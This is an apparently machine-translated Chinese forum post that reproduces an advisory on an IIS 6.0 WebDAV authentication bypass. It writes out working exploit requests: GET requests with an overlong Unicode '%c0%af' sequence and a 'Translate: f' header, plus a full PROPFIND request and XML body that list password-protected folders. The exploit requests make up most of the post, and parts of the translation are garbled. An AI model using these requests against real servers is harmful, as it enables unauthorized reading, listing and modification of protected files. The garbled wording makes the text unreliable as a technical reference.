漏洞发现者:Nikolaos Rangos
具体漏洞存在于带WebDAV功能的IIS 6.0中
Web服务器没有正确地处理Unicode命令的URI时,解析和发送回的数据.
假设有一个密码保护文件夹d:\inetpub\wwwroot\protected\
此文件夹内有一个名为 protected.zip "
向服务器发送一个HTTP GET请求
GET / %c0%af/protected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: servernameMu
指示Web服务器处理请求使用 WebDAV的
利用这种恶意的URI构建网络服务器发送文件到
/protected/ protected.zip ”而不要求进行适当的验证
另一个有效的请求可能会传送到Web服务器是:
GET /prot%c0%afected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: servername
IIS 6.0中将会删除„%c0%af” 的请求,并发送回密码保护文件而不验证.
ASP脚本不能下载,除非以这种方式提供服务的脚本源代码是启用的
可以绕过访问限制的,密码保护文件夹和列表,下载,上传和修改文件
Copy code PROPFIND /protec%c0%afted/ HTTP/1.1
Host: servername
User-Agent: neo/0.12.2
Connection: TE
TE: trailers
Depth: 1
Content-Length: 288
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:"><prop>
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<executable xmlns="http://apache.org/dav/props/"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>
</prop></propfind>
IIS的回应的目录列表的文件夹中没有要求输入密码
欢迎光临 得知互动 (https://bbs.dezhifl.com/) | Powered by Discuz! X3.4 |